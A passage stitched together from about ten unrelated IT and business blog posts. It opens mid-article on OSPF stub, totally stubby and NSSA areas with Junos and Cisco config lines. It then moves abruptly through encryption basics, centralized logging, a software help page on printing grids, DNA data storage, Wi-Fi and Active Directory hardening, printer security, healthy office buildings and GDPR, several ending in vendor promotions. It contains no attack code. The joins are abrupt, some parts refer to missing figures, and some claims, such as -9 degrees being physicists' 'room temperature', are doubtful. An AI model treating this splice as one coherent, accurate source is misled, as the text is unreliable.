For example, by having an LSA specifically for IPs that are external to OSPF (the Type 5 External LSA), it means that if we want to filter out these external prefixes, we don’t need to do anything complicated, like making access lists or prefix lists – all we have to do is block Type 5 LSAs! “Don’t give me any Type 5 LSAs”, our plucky router says. “I’m on a diet. Type 5 LSAs are empty calories to me.” This is what the routers say. This is literally what they say.
And, as you might have guessed by now, all we had to do to filter out these Type 5 LSAs was to configure Area 1 as a stub area. Like a lot of things in networking, the theory involves a lot of reading – but the actual configuration is one single line of config.
TOTALLY STUBBY AREAS
But it doesn’t stop there, because there’s another kind of stub area that can block even more stuff: Totally Stubby Areas. This area not only blocks the Type 5 (External) LSAs, but it also blocks Type 3 (Summary) LSAs too. Do you remember we talked about those a moment ago? They’re the ones that summarise the topology, and just advertise the prefixes of one area into another area.
If you configure an area to be Totally Stubby, you’ll get rid of both Type 3 and Type 5 LSAs. And just like a stub area, it’s super easy to configure.
In Junos, we add this extra config below to Router 2, the Area Border Router. We only need to add this extra config onto the ABR, because it’s this box that’s deciding whether to re-advertise the Type 3 Summary LSAs into Area 1.
root@Router_2# set protocols ospf area 1 stub no-summaries
All routers in the area need to know it’s a stub area, but only the Area Border Router needs to know to filter out Summary LSAs.
As for Cisco, it’s like this:
R2(config)#router ospf 1
R2(config-router)#area 1 stub no-summary
It’s interesting how neither vendor uses a command along the lines of “area 1 totally-stubby”. Instead, we make it a stub area, and then we say “no summary” – in other words, no Summary LSAs.
The result of getting rid of all External AND all Summary LSAs is a routing table on Router 1 that’s vastly smaller than before:
(Once again, Cisco will give you a default route here, whereas Junos needs the “default-metric 10” command.)
Woah – every single OSPF route is gone! Is that really correct?
Well, in our topology, yes! It’s a very small network, after all. If there were other routers in Area 1, I’d still be learning those prefixes by OSPF with no problem. But as it happens, the only OSPF prefixes that were previously in Area 1 came from other areas, or from outside of OSPF altogether. And now, they’re all gone!
So, now you know all about the behind-the-scenes mechanics, we can finally give a more accurate definition of a stub area:
A stub area blocks Type 5 LSAs. A totally stubby area blocks both Type 3 AND Type 5 LSAs.
NOT-SO-STUBBY, AND TOTALLY NOT-SO-STUBBY
There’s actually two final types of area to know about: Not-So-Stubby Areas (NSSAs), and Totally Not-So-Stubby Areas. Yep: that is their genuine name, because OSPF is absolutely ridiculous.
Looking one final time at our topology, imagine that Area 2 was also a stub area. Now, think about those BGP prefixes that are being imported into the area as Type 5 LSAs. What’s the definition of a Stub Area? That’s right: it’s an area that blocks Type 5 LSAs. But if Area 2 is a stub area, and a stub area blocks Type 5 LSAs, then how can we import these BGP prefixes?
That’s where NSSAs come in. They’re basically a hack: instead of importing those BGP prefixes as Type 5 LSAs, Router 4 would actually import them as Type 7 LSAs. That’s right: YET ANOTHER LSA TYPE TO REMEMBER!
Type 7 LSAs are called Not So Stubby Area External LSAs – and the amazing thing is, they’re almost exactly identical to Type 5 External LSAs: they allow us to bring in external prefixes, while not breaking the “No Type 5” rule. Then, when Router 3 re-advertises them from Area 2 to Area 0, it converts them from Type 7 to Type 5.
Totally Not-So-Stubby Areas are exactly the same as Totally Stubby Areas – they filter out both Type 3 and Type 5 LSAs, but once again we can use Type 7s to bring in external prefixes.
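Config-wise, NSSAs are just as painless as the other area types. A sketch of what it might look like in our lab, with Area 2 as the not-so-stubby area (as ever, add it on every router in the area, and check your platform’s documentation for the defaults around default routes into an NSSA):

root@Router_3# set protocols ospf area 2 nssa
R3(config)#router ospf 1
R3(config-router)#area 2 nssa

And for the totally not-so-stubby flavour, the extra keyword goes on the ABR just like before: “no-summaries” on Junos, “no-summary” on IOS.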
And with that, we’ve covered the ridiculous world of Stub Area types, and LSA types. You will have your own opinions on whether this is all “very clever” or “absolutely nonsense”. All I’ll say on the matter is that there’s a reason why I prefer IS-IS as an interior routing protocol.
I hope I’ve helped to clarify things a little bit! There’s a lot going on – but once it clicks, it’s really satisfying. By the way, you might have heard of something called a “Stub Network” in OSPF, and wondered whether it’s the same thing as a Stub Area. Confusingly, it turns out they’re different things. I’ve written a post all about it, so click if you’re interested!
If you enjoyed this post and you want to find out when I write more, follow me on Twitter! And if you find my blog useful or entertaining, I’d love you to share it with your friends and co-workers, whether via a Twitter/Facebook/LinkedIn post, or just emailing it to them directly. Spread the word, and I’ll be inspired to write even more posts.
And if you fancy some more learning, take a look through my other posts. I’ve got plenty of cool new networking knowledge for you on this website, especially covering Juniper tech and service provider goodness.
It’s all free for you, although I’ll never say no to a donation. This website is 100% a non-profit endeavour, in fact it costs me money to run. I don’t mind that one bit, but it would be cool if I could break even on the web hosting, and the licenses I buy to bring you this sweet sweet content.
The basic difference between these two types of encryption is that symmetric encryption uses one key for both encryption and decryption, while asymmetric encryption uses a public key for encryption and a private key for decryption.
Let’s explore each of these encryption methods separately to understand their differences better.
This is said to be the simplest and best-known encryption technique. As discussed already, it uses one key for both encryption and decryption.
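To make that concrete, here is a minimal sketch in Python using the third-party cryptography package (the package choice and sample message are ours, not the article’s). Note how the exact same key object both encrypts and decrypts:

from cryptography.fernet import Fernet  # pip install cryptography

key = Fernet.generate_key()   # the one shared secret
cipher = Fernet(key)

token = cipher.encrypt(b"quarterly account statement")
assert cipher.decrypt(token) == b"quarterly account statement"

Anyone who obtains that single key can read every message, which is exactly why key distribution is the hard part of symmetric encryption.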
This type of encryption is relatively new as compared to symmetric encryption, and is also referred to as public-key cryptography.
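A matching sketch for the asymmetric case, again with Python’s cryptography package and names of our choosing; the public key encrypts, and only the holder of the private key can decrypt:

from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()   # safe to publish

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
ciphertext = public_key.encrypt(b"shared session key", oaep)
assert private_key.decrypt(ciphertext, oaep) == b"shared session key"

In practice the two are often combined: asymmetric encryption protects a small symmetric session key, and the faster symmetric cipher then protects the bulk data.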
Now that we have a basic understanding of both the encryption types, let’s glance through the key differences between them.
While both of these have their own pros and cons, asymmetric encryption is definitely a better choice from the security perspective.
Most if not all modern systems have some way to track or log things that occur in the system from things as simple as a login to all the things that lead up to a kernel panic or application failure. The challenge with log analysis is the number of systems that organizations now depend upon to run their business. With the adoption of containers, hybrid cloud implementations, 3rd party APIs dependencies, and whatever other complexity each organization may have, log analysis has become a daunting task.
What is a log?
A log is simply a timestamp, most likely a severity, and a message stored in a file on a system. This may be over simplifying things as some systems may add more fields to add context. For instance, an application may add an ID so that the log can be referenced from an application trace; for security proposes the originating IP Address where an authentication request came from might be logged. But in the end a log usually looks something like this:
xx/xx/xxxx 00:00:00 – sev 3 – <message text>
Each hardware and software vendor logs in different ways (and sometimes there are differences even between their own products) and puts their logs in different areas of a file system. This can add a lot of manual effort before any log analysis can be accomplished, causing the analysis to take much longer than an organization may want or need. If a system or application is no longer running or usable, this poses a great risk to a business: not only can it not provide service to its clients, but there is also the chance of reputational impact.
Compounding the challenge of finding and then analyzing a log is the number of aforementioned systems an organization must use to run its business. This increases the difficulty of resolving an issue. An issue that could be solved in an hour or less may cause an outage of eight hours or more, because technicians must take time to figure out which haystack they need to search to resolve the issue.
The Resolution – Centralized Logging
Syslog has been around for a while and is a way for most infrastructure devices to create a common format within their systems. A Syslog Server was a way to centralize the logs from infrastructure devices to avoid the effort of logging into to each device, searching for a log file, and then analyze the logs. But as technology is more than just infrastructure (i.e. servers, storage, database and network) there is a need to get any logs from all technologies into a central repository in a format that can be queried easily. There are many vendors who have focused on this challenge. Each do things in different ways to address their client’s requirements.
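As a small illustration of how easy it is to point a system at a central collector, here is a sketch using Python’s standard logging module; the server name and port are placeholders for your own syslog collector:

import logging
import logging.handlers

# Forward application logs to a central syslog server over UDP.
handler = logging.handlers.SysLogHandler(address=("syslog.example.com", 514))
handler.setFormatter(logging.Formatter("%(name)s sev=%(levelname)s %(message)s"))

log = logging.getLogger("billing-app")
log.addHandler(handler)
log.setLevel(logging.INFO)
log.warning("payment gateway latency above threshold")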
Regardless of vendor, each solution is trying to accomplish the following tasks:
- Exporting logs (from systems and/or applications)
- Parsing logs into a common and/or expected format
- Ingesting logs (either on premise or in the cloud)
- Storing logs
- Ensuring security of logs
These tasks do not necessarily need to be done in order and some vendors tout their approach to either be more cost effective or to ensure all logs are stored or both. In the end the goal is to set up all the systems to export the logs to something so that they can be queried easily by either people or machines. For example, Artificial Intelligence may help look for the fault or trends to help an organization become more proactive. The holy grail in this situation is to use technology to automatically sense indicators before a fault and to automatically remediate the issue so that revenue risk is mitigated.
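To show what the parsing task in the list above might look like, here is a toy normalizer that turns one RFC 3164-style syslog line into JSON so that logs from different sources can be queried the same way (the sample line and field names are invented):

import json
import re

LINE = "<34>Oct 3 22:14:15 web01 sshd[2811]: Failed password for root"
PATTERN = re.compile(
    r"<(?P<pri>\d+)>(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<app>[\w.-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)"
)

match = PATTERN.match(LINE)
print(json.dumps(match.groupdict()))

Real pipelines do the same thing at scale, with hundreds of patterns and a common schema that every source is mapped into.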
Evolving Solutions helps clients understand these challenges and plan a path forward to integrate centralized logging into a greater observability strategy. As more organizations leverage technology to drive their business and innovation, understanding what is happening in all the systems involved is critical for informed business decisions. Through Evolving Solutions’ Enterprise Monitoring & Analytics approach, we give structure that enables modernization journeys.
Print a Grid
Print a Grid so that you can produce a hard-copy version of your data. When you print a Grid, you define:
- Which columns to print and in which order.
- Printer options: Which printer to use, printer page setup (ex: Paper, orientation, margins). These vary by printer/driver.
- Print layout options: Forced resizing, shading, and page numbering.
Good to know:
- Use the Preview button to preview on your screen what your printed Grid will look like when printed.
To print a Grid:
- In a Grid, click File>Print Grid or Right-click>Print Grid.
The Print Grid window opens.
- Select the columns you want to print by moving them to the Selected Fields box:
Note: By default, all rows are selected.
- Use the Left and Right Arrows to move columns from/to the Selected Fields box.
- Use the Up and Down Arrows to order the printed columns.
- Define the printer options:
- Printer: Select the printer to which to print.
- Page Setup: Click this button to define basic paper setup options (ex: Paper, orientation, margins).
- Font: Click this button to define the font, font style, and font size for the text on the printed Grid.
Note: Page Setup and Font options vary according to the driver of the selected printer.
- Define the print layout options:
- Force width to single page: Select this box to resize the printed Grid so that it fits on a single page (does not trail off the edge).
- Shade alternate rows: Select this box to add a gray shade to every other row of the Grid.
- Number pages: Select this box to add a page number to the footer of the printed page.
- Preview: Click this button to display a preview of the Grid before you print it.
- Click OK.
By Randy Weis, Consulting Architect, LogicsOne
Molecular and DNA Storage Devices- “Ripped from the headlines!”
-Researchers used synthetic DNA encoded to create the zeros and ones of digital technology.
-MIT Scientists Achieve Molecular Data Storage Breakthrough
-DNA may soon be used for storage: All of the world's information, about 1.8 zettabytes, could be stored in about four grams of DNA
-Harvard stores 70 billion books using DNA: Research team stores 5.5 petabits, or 1 million gigabits, per cubic millimeter in DNA storage medium
-IBM using DNA, nanotech to build next-generation chips: DNA works with nanotubes to build more powerful, energy-efficient easy-to-manufacture chips
Don’t rush out to your reseller yet! This stuff is more in the realm of science fiction at the moment, although the reference links at the end of this post are to serious scientific journals. It is tough out here at the bleeding edge of storage technology to find commercial or even academic applications for the very latest, but this kind of storage technology, along with quantum storage and holographic storage, will literally change the world. Wearable, embedded storage technology for consumers may be a decade or more down the road, but you know that there will be military and research applications long before Apple gets this embedded in the latest 100 TB iPod. Ok, deep breath—more realistically, where will this technology be put into action first? Let’s see how this works first.
DNA is a three dimensional media, with density capabilities of up to a zettabyte in a millimeter volume. Some of this work is being done with artificial DNA, injected into genetically modified bacteria (from a Japanese research project from last year). A commercially available genetic sequencer was used for this.
More recently, researchers in Britain encoded the “I Have a Dream” speech and some Shakespeare Sonnets in synthetic DNA strands. Since DNA can be recovered from 20,000 year old wooly mammoth bones, this has far greater potential for long term retrievable storage than, say, optical disks (notorious back in the 90s for delaminating after 5 years).
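To give a feel for the core idea, here is an illustrative Python sketch that maps bits onto the four DNA bases. This is our own toy scheme: the actual research (the Goldman group’s, for instance) used base-3 codes with redundancy to avoid error-prone runs of repeated bases.

# Toy 2-bits-per-base codec; real schemes add error correction.
TO_BASE = {"00": "A", "01": "C", "10": "G", "11": "T"}
FROM_BASE = {v: k for k, v in TO_BASE.items()}

def encode(data: bytes) -> str:
    bits = "".join(f"{byte:08b}" for byte in data)
    return "".join(TO_BASE[bits[i:i + 2]] for i in range(0, len(bits), 2))

def decode(strand: str) -> bytes:
    bits = "".join(FROM_BASE[b] for b in strand)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

assert decode(encode(b"I have a dream")) == b"I have a dream"

Two bits per base is also where the eye-popping density figures start: every nucleotide carries a quarter of a byte.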
Reading the DNA is more complicated and expensive, and the “recording” process is very slow. It should be noted that no one is suggesting storing data in a living creature at this point.
Molecular storage is also showing promise, in binding different molecules in a “supramolecule” to store up to 1 petabyte per square inch. But this is a storage media in two dimensions, not three. This still requires temperatures of -9 degrees, considered “room temperature” by physicists. This work was done in India and Germany. IBM is working with DNA and carbon nanotube “scaffolding” to build nano devices in their labs today.
Where would this be put to work first? Google and other search engines, for one. Any storage manufacturer would be interested—EMC DNA, anyone? Suggested use cases: globally and nationally important information of “historical value” and the medium-term future archiving of information of high personal value that you want to preserve for a couple of generations, such as wedding video for grandchildren to see. The process to lay the data down and then to decode it makes the first use case of data archiving the most likely. The entire Library of Congress could be stored in something the size of a couple of sugar cubes, for instance.
What was once unthinkable (or at least only in the realm of science fiction) has become reality in many cases: drones, hand held computers with more processing power than that which sent man to the moon, and terabyte storage in home computers. The future of data storage is very bright and impossible to predict. Stay tuned.
Here is a graphic from Nature Journal (the Shakespeare Sonnets), “Towards practical, high-capacity, low-maintenance information storage in synthesized DNA” http://www.nature.com/nature/journal/vaop/ncurrent/full/nature11875.html#/ref10
Click here to learn more about how GreenPages can help you with your organization's storage strategy
Researchers used synthetic DNA encoded to create the zeros and ones of digital technology.
MIT Scientists Achieve Molecular Data Storage Breakthrough
DNA may soon be used for storage
Harvard stores 70 billion books using DNA
IBM using DNA, nanotech to build next-generation chips
Wi-Fi has been part of our daily lives for more than 20 years. First used to connect computer devices like laptops in enterprise environments, it quickly expanded to every single home, office, and public place to connect mobile devices to a network – local or Internet – for management and data exchange. This has become even more prominent with the recent exponential growth of the Internet of Things (IoT).
Understanding Your End-User Wi-Fi Risks
It is important to be careful as Wi-Fi is one of the favorite methods for hackers to steal valuable information from our devices, either personal (e.g., credentials, credit card information, etc.) or work-related (e.g., emails, classified documents, etc.).
There are dozens of well-proven attacks relying on Wi-Fi. The most common are Man-in-the-Middle (MitM) attacks, where an attacker manages to intercept communications between two parties to alter them, while these parties believe they are legitimately exchanging information between themselves – similar to impersonation. Some of the techniques used include “DNS spoofing” or “DNS hijacking,” where the attacker manages to intercept DNS queries and return an alternative address in order to redirect traffic to a rogue server under his control, instead of the legitimate one.
Another is eavesdropping, also known as “sniffing,” where an attacker secretly listens to the communications between two parties to gather valuable information: typically user credentials, credit card information, or anything else that can be extracted from unsecured data transmissions.
Protect Your End-Users’ Devices
Considering you cannot trust or control any Wi-Fi network except your own, one of the best measures you can take to ensure corporate data is not compromised is to secure your devices. From an enterprise perspective, you want to prevent any data on your managed devices from travelling over an unsecured, untrusted network.
However, you should consider the type of devices your users are using, the ownership, and the management mode before you can determine what is available to secure them as much as possible.
With Bring Your Own Device (BYOD) devices, you cannot control the device itself, only the work part, so you want to make sure that even if the device and/or connection is compromised, that all corporate information is safe. In this case, the best option would be to use a containerized solution for your work apps/data to ensure data will be safe both at rest and in transit. This way communications cannot be intercepted, nothing can be extracted by a malicious entity, and all company data remains safe.
Managing Corporate-Owned Devices
With corporate-owned devices, your UEM software should already include some Wi-Fi related policies and profiles to help control which Wi-Fi networks your devices can connect to and how. In terms of management modes, we have mainly two options: Corporate-Owned Personal Enabled (COPE) and Corporate-Owned Business Only (COBO), depending how much room we want to leave the user to install personal apps and store personal documents on the device.
Ensure corporate devices are configured and provisioned automatically on all managed devices using Wi-Fi configuration profiles so work data will only be travelling over secure and trusted networks.
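As a rough illustration of what such a profile contains, here is a Python sketch that emits an Apple-style managed Wi-Fi payload with plistlib. The key names follow Apple’s published Wi-Fi payload schema, but treat the whole thing as an approximation: in practice your UEM console generates and signs the real profile for you.

import plistlib
import uuid

wifi_payload = {
    "PayloadType": "com.apple.wifi.managed",
    "PayloadIdentifier": "com.example.wifi.corp",   # placeholder identifier
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadVersion": 1,
    "SSID_STR": "CORP-SECURE",                      # the trusted corporate SSID
    "EncryptionType": "WPA2",
    "AutoJoin": True,
}
profile = {
    "PayloadType": "Configuration",
    "PayloadIdentifier": "com.example.profile.wifi",
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadVersion": 1,
    "PayloadContent": [wifi_payload],
}
print(plistlib.dumps(profile).decode())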
The last step is to ensure all work-related data (COPE) or even all device data (COBO) is transmitting over a secure connection to your own back-end servers, either located behind firewall, on-premises, or out in the open on the Internet. For that, your UEM vendor should have either a containerized solution, a VPN-like solution, and/or its own infrastructure to ensure communications are secured, end-to-end.
Securing Corporate-Owned Devices
In addition to that, there are extra steps you can take to secure corporate-owned devices even further when required for specific use cases.
For example, you can control which Wi-Fi networks enterprise devices can connect to and what type of information is transmitted by not allowing end-users to manually add new Wi-Fi networks (e.g., home office), not allowing connections to public captive networks (e.g., mall, hotel), or even blacklisting known untrusted networks (e.g., carrier-provisioned).
To prevent data leakage, it is also recommended to disable direct Wi-Fi (when supported), so a device cannot communicate with another directly, point-to-point, and stream/transfer data without any control or monitoring over that connection.
Finally, in some extreme situations like regulated environments where security is a must, it is possible to disable Wi-Fi completely on the device so cellular network is used instead, eventually with a dedicated Access Point Name (APN) to ensure work data is still transmitting over a secure connection back to your internal network.
Note: Policy rules will differ depending on the options available, the type of device (iOS, Android), and UEM solution(s), but these should be available in most cases.
If you have any questions or concerns about how to improve your security posture, please feel free to contact us.
(C) Rémi Frédéric Keusseyan, Global Head of Training, ISEC7 Group
Unstructured data is any data that is not stored in a pre-defined schema, and can include Word, text and PDF documents, photos, videos, MP3s, emails, data obtained via social media platforms and various types of personal data.
According to a forecast by the IDC, 80 percent of global data will be unstructured by 2025.
Unlike a relational database, for example, unstructured data can be difficult to identify, and thus protect. This is likely to be the main reason why 65% of organizations can’t analyse or categorize all the consumer data they store, according to the Data Security Confidence Index.
Additionally, according to an article by itproportal.com, 65% of businesses are collecting too much data and can’t find the time or resources to analyse all of it. With this in mind, a good place to start would be to remove or archive any data that is not necessary for day-to-day business operations.
Perhaps the simplest and most effective way to identify unstructured data – especially data that is sensitive – is to use a data discovery and classification tool. However, in order for these tools to be effective, we need to ensure that the access control protocols and policies we have in place have been hardened, so as to prevent users from accessing resources that are not relevant to their role.
90% of organizations across the globe use Microsoft Active Directory (AD) as their primary access control solution. AD enables administrators to organize users into logical groups and subgroups, with each group having its own set of permissions.
Before we can secure our unstructured data, we must carefully review these groups and their permissions, and “harden” them to ensure that users are not able to access resources they do not require. Below are some basic steps to follow.
Use Passphrases as Opposed to Complex Passwords
Naturally, strong passwords are the pinnacle of effective data security. It is becoming more popular to use passphrases as opposed to passwords as they are easier to remember, yet still sufficiently complex.
If the passphrase is easy to remember, the user may not need to write it down, thus making it more secure.
A common practice is to choose at least three unrelated words, and insert numbers and special characters between them, for example, tree4door!cat#boat, or summer42shirt/bulb.
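If you want to hand users a generator instead of a rule, a few lines of Python’s secrets module will do it. The wordlist below is a stand-in; in practice you would use a large list such as EFF’s diceware words so the phrase has real entropy.

import secrets

WORDS = ["tree", "door", "cat", "boat", "summer", "shirt", "bulb", "river"]

def passphrase(n_words: int = 3) -> str:
    words = [secrets.choice(WORDS) for _ in range(n_words)]
    digit = secrets.choice("0123456789")
    symbol = secrets.choice("!#/&?")
    return digit.join(words[:-1]) + symbol + words[-1]

print(passphrase())   # e.g. tree4door!cat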
Clean up Unused Objects
To ensure basic AD hygiene, some initial housekeeping is required. This involves conducting a review of all users, groups and computers that are no longer being used. This will not only help to reduce the attack surface but will also make it easier to manage.
When dealing with objects that are used infrequently, you will need to do some research into what these objects are, who is the owner of the objects, how they are being used, and why they are necessary. You can use this information to add some context to the object, for future reference.
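One hedged sketch of how that research might be automated: query AD over LDAP for accounts that haven’t logged on in six months, using the third-party ldap3 package. The server, bind account, and base DN below are placeholders, and lastLogonTimestamp is a Windows FILETIME (100-nanosecond ticks since 1601).

from datetime import datetime, timedelta
from ldap3 import Server, Connection, ALL

cutoff = datetime.utcnow() - timedelta(days=180)
filetime = int((cutoff - datetime(1601, 1, 1)).total_seconds() * 10_000_000)

server = Server("ldaps://dc01.example.com", get_info=ALL)
conn = Connection(server, user="EXAMPLE\\audit-svc", password="...", auto_bind=True)
conn.search(
    search_base="DC=example,DC=com",
    search_filter=f"(&(objectClass=user)(lastLogonTimestamp<={filetime}))",
    attributes=["sAMAccountName", "lastLogonTimestamp"],
)
for entry in conn.entries:
    print(entry.sAMAccountName, "- stale, review before disabling")

Remember that lastLogonTimestamp replicates with a delay of up to two weeks, so treat the results as candidates for review rather than a disable list.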
Lock Down Service Accounts
A service account is a special type of account which allows applications to authenticate to AD, and thus gain access to the underlying operating system. These types of accounts are frequently targeted by attackers as they are rarely monitored, have elevated privileges, and use passwords which don’t expire.
It is crucial that service accounts are closely monitored, and that access permissions have been hardened. You may need to check with the vendor to find out what privileges the application needs. Any passwords associated with service accounts need to be periodically rotated.
Monitor and Remove All Other Admin-Like Permissions
Permissions which allow users to reset passwords, make changes to group memberships, and make changes to accounts or objects that facilitate replication, must also be locked down to prevent unauthorised access.
Likewise, employees should not be allowed to access admin accounts on their workstations, as an attacker might gain control of the workstation, install malicious software, and so on. Any permissions that are not required, must be removed and permissions that cannot be removed must be carefully monitored.
Administrators need to be alerted, in real-time, when they change, and by whom.
Eliminate Permanent Membership in Security Groups
Were an attacker to gain access to security groups such as Enterprise Admin, Schema Admin, and Domain Admin, they will have free reign to do pretty much anything that want. As such, it is crucially important that access to these groups is immediately revoked when they are no longer relevant.
Since Enterprise Admin and Schema Admin groups are not used often, restricting access to these groups won’t be much of a problem. However, Domain Admin groups are typically used more frequently, and so you will need to adopt a pro-active approach to granting and revoking permissions.
Data Discovery and Classification
So now that we’ve reviewed all permissions to ensure that accounts are granted the least privileges they need to carry out their role, the next step is to classify our unstructured data. Naturally, if we are to stand any chance of keeping our data secure, we need to know exactly what data we have, where it is located, and how sensitive the data is.
The good news is that we don’t have to do this manually. Most sophisticated auditing solutions provide tools which can automatically discover and classify unstructured data containing a wide range of data types, including Social security numbers, payment card information, protected health information, and so on.
We also need an inventory of important events involving our unstructured data, which includes information about who, what, where and when, the events took place. A real-time auditing solution can keep track of all changes to AD permission, as well as any files and folder containing sensitive data.
Any suspicious events will be reported to the relevant personnel where they can review the changes and take action accordingly. Such events will include permission and configuration changes, files and folders that have been accessed, moved, copied, modified or deleted.
Attackers will often try to hijack user accounts that are inactive, as they provide them with a way to infiltrate a network without arousing too much suspicion. Fortunately, most real-time auditing solution can automatically detect and manage inactive user accounts.
If you would like to see how the Lepide Data Security Platform combines data classification, user behavior analytics and access governance into one scalable solution, schedule a demo with one of our engineers today.
You’ve probably protected or encrypted your network, computer, and email. However, did you know that your printer and copier are just as much of a security liability as any other device in the office?
Network printers and copiers are the machines that often handle sensitive documents and information, providing an access route to other computers or networks. Printers have become more complex now able to connect to the Internet, have increased random access memory (RAM), integrated disk drives, and multi-functionality. Each of these is a potential security vulnerability that should be taken more seriously. Below, we’ve highlighted the five main threats to printers as well as how to step up your security for them.
5 Main Cybersecurity Threats and Vulnerabilities for Shared Printers
The more advanced, business-class multi-function printers and copiers are subject to a greater number of threats, since they are computers with their own hard drives, operating systems, and direct network connections. Below are a few liabilities that come with a lack of printer security:
- Document Theft/ Snooping
- Unauthorized Changes to Settings
- Saved Copies on Internal Storage
- Eavesdropping on Network Printer Traffic
- Printer Hacking via the Network or Internet
These vulnerabilities range from the overly simplified to the expert hacker. It is easy for anyone to walk over to a printer and pick up a document that belongs to someone else. However, it can be just as easy to hack a printer if it is connected to a network.
How to Protect Against Printer Vulnerabilities
One of the easiest ways to prevent document theft, unauthorized access to stored documents, or a misuse of the printer’s connection is to place the printer in a visible, open area. Additionally, try designating printers for management and other sensitive departments so that you can keep those machines more secure. Finally, buying a printer that requires users to provide some form of identification before it prints is another way to decrease the chances of a cyber hack.
Carson Inc. Combats Cyber Threats
Don’t sacrifice your security for convenience. Carson Inc. has been helping its customers fight the battle against cyber threats for more than 22 years. Our team consists of Information Assurance (IA) experts with advanced degrees and technical certifications, including CISSP, CISA, LPT, GWASP, and ISO 27001. Our staff has in-depth knowledge of IT security statutory and regulatory guidance.
“We shape our buildings; thereafter they shape us” – Winston Churchill.
Do we know that people spend more than 90% of their lives indoors? And if we are spending more time indoors, then it is evident that our workplaces have a significant ability to influence our overall health and wellbeing.
As building professionals, how we design, build, and operate our buildings can make a difference for millions of people. According to the WELL building institute, “we must invest in people for a higher return of investment” in terms of business value.
Over the last 20 years, the industry has changed significantly, and more people are now working in offices, meaning that it is more important that employees have a healthy office to work at. Some studies show that more restorative offices with better air quality make people sharper and brighter. The ongoing pandemic has forced businesses and companies to consider how crucial it is to invest in people and the environment.
Additionally, we are burdened with a real problem regarding poor air quality in our external environment. So, it becomes much more crucial to have our indoors which can serve us with better air quality.
The buildings thus play a crucial role in the spread of disease. If the facilities are operated smartly, they can also help us fight against it. As we prepare for the new normal, we need to evaluate our buildings and indoor environment’s impact on our health and wellbeing. The best part is that we don’t have to undergo an extensive renovation or construct a new building to incorporate healthy workplaces.
Some measures are easily doable and can make a significant impact. These include the following:
1. Air Quality
• Assess the ventilation and fresh air intake as per ASHRAE standards.
• Assess and maintain air treatment systems, change filters regularly, upgrade to MERV 13 or above, and have carbon filters.
• Test and monitor air quality, its particle count & CO2 levels.
• Integrate live plants throughout the space.
• Promote a smoking-free environment.
2. Water Quality
• Test and monitor water quality
• Maintain treatment systems and change filters regularly
• Apply water conservation strategies such as Low flow indoor plumbing fixtures such as faucets and showerheads.
3. Hygiene and Cleaning
• Reduce surface contact (e.g., foot grabs for doors, etc.).
• Improve cleaning practices and product selection using nontoxic and green products.
• Coating high touch surfaces (countertops, handles, doorknobs, elevator buttons, light switches, etc.) for antimicrobial activity.
• Indoor garbage cans having lids and hands-free operation and Pest reduction measures.
4. Movement and Fitness
• Encourage movement throughout the workplace and exercise on breaks.
• Change posture to stand/sit at workstations.
• Using public transport/walking/biking to workplaces.
• Using staircase instead of lifts and escalators.
5. Light, Thermal and Acoustic Comfort
• Bring in as much natural light as possible and provide shading for glare control.
• Set temperature within the comfort zone of 23 to 27 degrees and relative humidity at 40 to 60%.
• Assess sound travel and add acoustic panels wherever needed and are easily integrated.
6. Nourishment
• Provide local, organic, whole food with nutritional information.
• Provide storage/heating for healthy home-packed lunch.
• Provide communal garden space for herbs and vegetables.
7. Enhancing employee experience
• Adding artwork, color, and texture to stimulate mental health
• Choose the right kind of biophilic elements which can increase people’s connectivity to the natural environment.
Providing employees with an efficient and comfortable work environment helps create a healthy building that will foster creativity, increase engagement and collaboration, and inspire employees to be their best. A workplace strategy that combines sustainable practices with wellness-driven concepts thus becomes paramount.
As building professionals, we have a responsibility to integrate sustainable solutions to our design and construction practices which can improve public health and wellbeing and at the same time add value-added services for our clients.
By Bharat Tagra, Director – Project Management, Colliers India
Bharat is responsible for leading the fit-out project management business for North & East India as a part of Occupier services.
With over 19 years of experience operating in a fast paced, always demanding and ever – changing environment of commercial sector, Bharat has demonstrated as a clear thinker and having an ability to remain calm and consistent under pressure.
For more information, please visit:
What’s the General Data Protection Regulation, known as GDPR, have to do with the cloud? The answer: a lot.
Personal data — any data that can identify a person — is increasingly making its way into the cloud. For example, organizations are using IoT-connected devices, AI, and RFID technologies to collect, use, and integrate personal information into products and are storing and processing that data in the cloud.
GDPR provides updated legislation throughout the EU to protect that personal data. It covers many of the previously unforeseen ways that personal data is gathered and used, which includes the cloud.
It simplifies the regulatory environment for international business by unifying the regulation within the EU. The provisions are consistent across all EU member states, which means companies have just one standard to meet within the EU. It also includes tough fines for non-compliance and breaches.
Who’s Subject to GDPR Compliance
The GDPR requirements aren’t just for EU companies. They apply to any organization doing business in the EU or that processes personal data originating in the EU. The data can be about residents or visitors. Because the data may be processed outside the EU, many U.S. companies are subject to the GDPR regardless of their base of operations.
The GDPR also defines compliance responsibility for data controllers and data processors. The data controller defines how the data is processed and why, and is responsible for making sure outside contractors comply. Data processors are the internal groups that maintain and process personal data records. Or, it could be a third-party company that performs all or part of those activities.
The GDPR holds both controllers and processors liable for non-compliance. That means both an organization and its partner organization, such as a cloud provider, would be subject to non-compliance penalties even if the partner is the one at fault. That’s why many companies using cloud services go with organizations like AWS. All AWS services comply with the GDPR. In addition to benefiting from all of the measures that AWS takes to maintain GDPR compliance and high-level security, organizations can deploy AWS services as a key part of their GDPR compliance plans.
What Your Organization Must Do to Be GDPR Compliant
If your organization is subject to GDPR compliance, the following are some of the things you’ll likely need to do:
• Determine what areas of your organization fall under the GDPR’s scope. Is your organization a data controller, processor, or both? The category it falls under will determine its compliance requirements under GDPR.
• Identify what data you have, what you do with it, where it’s being stored and/or processed, who has access to it, and where it’s being exported outside the organization. Audit your current compliance position against the GDPR’s requirements. You may need an outside organization with GDPR compliance expertise to help with this step.
• If there are any compliance gaps, determine what it will take to fix them. If you use an outside organization for the audit, it should be able to help you with this step as well. Then bring your existing policies, processes, procedures, and technical and security controls into line with the GDPR’s requirements. Again, this may require the assistance of an organization with GDPR compliance experience.
